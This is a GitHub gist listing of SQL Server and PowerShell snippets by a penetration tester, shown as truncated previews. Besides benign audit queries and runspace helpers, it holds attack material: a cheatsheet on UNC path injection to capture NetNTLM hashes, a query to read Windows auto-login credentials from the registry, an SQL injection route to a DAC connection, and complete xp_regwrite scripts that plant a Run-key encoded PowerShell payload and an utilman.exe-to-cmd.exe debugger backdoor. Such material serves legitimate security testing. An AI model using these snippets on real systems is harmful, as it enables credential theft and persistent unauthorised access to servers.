Scott Sutherland nullbind
nullbind
/ SQL Server - List Enabled Audit Specifications
Created
March 11, 2016 18:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- List enabled server specifications | |
| SELECT audit_id, | |
| a.name as audit_name, | |
| s.name as server_specification_name, | |
| d.audit_action_name, | |
| s.is_state_enabled, | |
| d.is_group, | |
| d.audit_action_id, | |
| s.create_date, | |
| s.modify_date |
nullbind
/ SQL Server - List Privileges
Created
March 11, 2016 18:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- Returns server level privileges. | |
| -- Reference: http://msdn.microsoft.com/en-us/library/ms186260.aspx | |
| SELECT GRE.name AS Grantee | |
| ,GRO.name AS Grantor | |
| ,PER.class_desc AS PermClass | |
| ,PER.permission_name AS PermName | |
| ,PER.state_desc AS PermState | |
| ,COALESCE(PRC.name, EP.name, N'') AS ObjectName | |
| ,COALESCE(PRC.type_desc, EP.type_desc, N'') AS ObjectType | |
| FROM [sys].[server_permissions] AS PER |
nullbind
/ SQL Server - Making a DAC connection via SQLi using ad-hoc queries
Last active
September 16, 2019 04:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- Making a DAC connection via SQLi or direct connection using ad-hoc queries | |
| -- Verify that we don't have access to hidden SQL Server system tables - returns msg 208 "Invalid object name 'sys.sysrscols'." | |
| SELECT * FROM sys.sysrscols | |
| -- Enable ad hoc queries (disabled by default) | |
| -- Note: Changing this configuration requires sysadmin privileges. | |
| -- Note: For sqli this can be placed into a stored procedure or binary encoded+executed with exec |
nullbind
/ Runspace Example
Created
June 3, 2016 17:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Modified Example From : https://blogs.technet.microsoft.com/heyscriptingguy/2015/11/28/beginning-use-of-powershell-runspaces-part-3/ | |
| # Added import of all current session functions into the sessionstate for the runspacepool | |
| # -------------------------------------------------- | |
| #region - Setup custom functions | |
| # -------------------------------------------------- | |
| # Create custom function to import into runspace session state | |
| Function ConvertTo-Hex { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Modified version of https://github.com/RamblingCookieMonster/Invoke-Parallel | |
| # added option to import all current sessions functions into the runspace session state | |
| function Invoke-Parallel { | |
| <# | |
| .SYNOPSIS | |
| Function to control parallel processing using runspaces | |
| .DESCRIPTION | |
| Function to control parallel processing using runspaces |
nullbind
/ SQL Server UNC Path Injection Cheatsheet
Last active
March 1, 2025 19:51
SQL Server UNC Path Injection Cheatsheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This is a list of SQL Server commands that support UNC path [injections] by default. | |
| The injections can be used to capture or replay the NetNTLM password hash of the | |
| Windows account used to run the SQL Server service. The SQL Server service account | |
| has sysadmin privileges by default in all versions of SQL Server. | |
| Note: This list is most likely not complete. | |
| ----------------------------------------------------------------------- | |
| -- UNC Path Injections Executable by the Public Fixed Server Role | |
| ----------------------------------------------------------------------- |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0..100 | ForEach-Object{ | |
| $x = 37 + (GET-RANDOM 4000) | |
| $y = 37 + $_ | |
| [console]::beep($x,$y) | |
| } |
nullbind
/ Get-SQLWinAutoLoginCreds.sql
Last active
September 16, 2019 04:58
Get the Windows auto login credentials through SQL Server
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- Get the Windows auto login credentials through SQL Server using xp_regread | |
| -- Requires sysadmin privileges | |
| -- Reference: https://support.microsoft.com/en-us/kb/887165 | |
| ------------------------------------------------------------------------- | |
| -- Get Windows Auto Login Credentials from the Registry | |
| ------------------------------------------------------------------------- | |
| -- Get AutoLogin Default Domain | |
| DECLARE @AutoLoginDomain SYSNAME |
nullbind
/ reg_persist1.sql
Last active
September 16, 2019 04:58
Use SQL Server xp_regwrite to configure a file to run when users login
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --------------------------------------------- | |
| -- Use SQL Server xp_regwrite to configure | |
| -- a file to execute ps encoded command when users login | |
| ---------------------------------------------- | |
| EXEC master..xp_regwrite | |
| @rootkey = 'HKEY_LOCAL_MACHINE', | |
| @key = 'Software\Microsoft\Windows\CurrentVersion\Run', | |
| @value_name = 'EvilSauce', | |
| @type = 'REG_SZ', | |
| @value = '"PowerShell -ENC <encodedcommand>"' |
nullbind
/ reg_persist2.sql
Last active
September 16, 2019 04:58
run defined debugger instead of intended command
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- This will create a registry key through SQL Server (as sysadmin) | |
| -- to run a defined debugger (any command) instead of intended command | |
| -- in the example utilman.exe can be replace with cmd.exe and executed on demand via rdp | |
| --- note: this could easily be a empire/other payload | |
| EXEC master..xp_regwrite | |
| @rootkey = 'HKEY_LOCAL_MACHINE', | |
| @key = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe', | |
| @value_name = 'Debugger', | |
| @type = 'REG_SZ', | |
| @value = '"c:\windows\system32\cmd.exe"' |
OlderNewer